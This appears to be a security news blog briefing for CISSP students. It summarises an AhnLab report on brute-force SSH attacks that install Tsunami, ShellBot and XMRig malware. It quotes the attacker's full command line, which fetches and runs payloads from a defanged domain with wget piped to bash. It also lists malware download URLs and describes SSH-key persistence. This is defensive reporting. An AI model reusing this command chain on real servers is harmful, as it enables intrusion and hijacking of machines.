Les Bell
Blog entry by Les Bell
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Attacks on Poorly-Secured Linux Servers via sshd
Security researchers at South Korea's AhnLab Security Emergency Response Center have uncovered a campaign being run by an unknown threat actor against poorly-managed Linux servers via the SSH daemon (sshd). Once the actor has gained initial access, they install a range of malware, including the Tsunami DDoS bot, ShellBot, the XMRig Monero cryptominer and Log Cleaner.
Initial access seems to be gained through a brute force attack using common weak credentials (seriously - who uses "abcdefghi" or "123@abc" as a password on the root account?). From this point, a command line is pasted in which downloads and runs a variety of malware:
# nvidia-smi –list-gpus | grep 0 | cut -f2 -d: | uniq -c;nproc;ip a | grep glo;uname -a;cd /tmp;wget -O – ddoser[.]org/key|bash;cd /var/tmp;wget ddoser[.]org/a;chmod +x a;./a;wget ddoser[.]org/logo;perl logo irc.undernet.org 6667 -bash;rm -rf logo;wget ddoser[.]org/top;tar -zxvf top;rm -rf top;cd lib32;./go > /dev/null 2>&1 &
Some of the commands here are obviously meant to enumerate hardware such as GPU's which could be used for cryptomining as well as to profile the machine, while the wget commands download the attacker's malware and tools. One of these is a shell script called key which, when run, performs some cleanup and also inserts a public key into the compromised account's ~/.ssh/authorized_keys file, allowing the actor to persist even if the weak password is changed.
The other malware is:
| Download URL | Malware |
|---|---|
| ddoser[.]org/key | Downloader Bash |
| ddoser[.]org/logo | ShellBot DDoS Bot |
| ddoser[.]org/siwen/bot | ShellBot DDoS Bot |
| ddoser[.]org/siwen/a | Tsunami DDoS Bot |
| ddoser[.]org/siwen/cls | MIG Logcleaner v2.0 |
| ddoser[.]org/siwen/clean | 0x333shadow Log Cleaner |
| ddoser[.]org/siwen/ping6 | Privilege escalation malware |
| ddoser[.]org/top | XMRig CoinMiner (compressed file) |
ASEC's report provides a complete rundown on this list of malware.
There's an obvious lesson here: SSH is mostly used for system administration, and administrators should be smart enough to know better. Passwords are a losing proposition - weak passwords especially so - and setting up public-key authentication with OpenSSH and PuTTY is very easy, after which password logins can be disabled completely, by setting
PasswordAuthentication no
in /etc/ssh/sshd_config. After that, one can sleep easily because this, and similar distributed, password brute-forcing campaigns will simply not work.
Sanseo, Tsunami DDoS Malware Distributed to Linux SSH Servers, blog post, 20 June 2023. Available online at https://asec.ahnlab.com/en/54647/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.